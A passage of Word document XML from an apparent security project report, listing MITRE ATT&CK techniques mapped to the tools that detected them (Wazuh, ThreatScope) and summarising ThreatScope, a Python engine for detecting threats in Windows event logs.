              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14353AD3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2C5282"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1548.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="345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0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="591E706A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Sudo and Sudo Caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448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0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FCB8272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Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D585DDA" w14:textId="77777777" w:rsidR="00BA2BC0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7"/>
              </w:rPr>
              <w:t>Wazuh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="01B00A0D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081A2D07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2C5282"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1059</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="345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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F3E2A1A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Command &amp; Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EE21FFF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Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03F24E3C" w14:textId="77777777" w:rsidR="00BA2BC0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7"/>
              </w:rPr>
              <w:t>ThreatScope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="1F76C0C9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="597E3551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2C5282"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="345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0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59D03ECA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Obfuscated Files (Base64/IEX)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448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0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2505BE7A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Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="686901CB" w14:textId="77777777" w:rsidR="00BA2BC0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7"/>
              </w:rPr>
              <w:t>ThreatScope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="2E88D50A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29CE920C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2C5282"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1090.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="345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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74C5A495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Multi-hop Proxy (Tor)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D47DA3E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C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="288C6EF1" w14:textId="77777777" w:rsidR="00BA2BC0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7"/>
              </w:rPr>
              <w:t>ThreatScope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="549A39FD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5261B108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2C5282"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1134 / T1134.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="345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0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08D155ED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Access Token Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448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0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61DA2CA7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Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09EFEE6B" w14:textId="77777777" w:rsidR="00BA2BC0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7"/>
              </w:rPr>
              <w:t>ThreatScope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="175295EF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BAF84D0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2C5282"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1564.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="345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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5786FA99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NTFS Alternate Data Streams</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7048B405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Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="302F07FF" w14:textId="77777777" w:rsidR="00BA2BC0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7"/>
              </w:rPr>
              <w:t>ThreatScope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="586025DF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="564EB290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2C5282"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1505.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="345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0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="242515C1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Web Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448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0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DC065FB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Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="191511FF" w14:textId="77777777" w:rsidR="00BA2BC0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7"/>
              </w:rPr>
              <w:t>ThreatScope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="653EF733" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B99CBBA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2C5282"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1087.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="345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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5629981A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Local Account Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14BD0F44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Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33FF53CF" w14:textId="77777777" w:rsidR="00BA2BC0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7"/>
              </w:rPr>
              <w:t>ThreatScope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="06D824DE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B9E58E9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color w:val="2C5282"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1082</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44C5C660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System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="725821A5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sz w:val="17"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D0DFF0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="B0C4DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4FF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A0FAFCD" w14:textId="77777777" w:rsidR="00BA2BC0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sz w:val="17"/>
              </w:rPr>
              <w:t>ThreatScope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D0B0083" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00BA2BC0">
      <w:pPr>
        <w:sectPr w:rsidR="00BA2BC0">
          <w:headerReference w:type="even" r:id="rId19"/>
          <w:headerReference w:type="default" r:id="rId20"/>
          <w:headerReference w:type="first" r:id="rId21"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1200" w:right="1200" w:bottom="1315" w:left="1200" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A1F6D58" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7. THREATSCOPE — TOOL SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B294F2" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="65"/>
        <w:ind w:left="-5" w:right="-15"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatScope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (v3.0.0) is a custom-built Python threat detection engine developed as part of this project's toolset. It was used to perform deep static analysis on exported Windows Event Log </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>files (.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>evtx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>), providing detection capabilities beyond what is natively available in a standard SIEM deployment.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="6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7128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="35532C22" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A1A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5808E8CC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w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A1A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68D7AEA0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BA2BC0" w14:paraId="6B1941E2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52D0DF6E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3A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Detection Rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="321858F3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144 built-in rules + 1 Sigma rule (custom)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="1753D7AC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4301729D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3A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Log Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF0"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2996C016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.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>evtx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, .log, .txt (Windows Event Logs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="5196EA70" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0685A67F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3A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="505114C7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Automatic technique mapping per finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="6318ACDA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25ACA3DB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3A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IOC Extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF0"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B16C1E0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IPs, domains, URLs, hashes, CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="162D0FD4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44AC1869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3A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Export Formats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19315F98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JSON report + STIX 2.1 threat intel bundle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="7B1B1125" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59C5080A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3A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>File Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
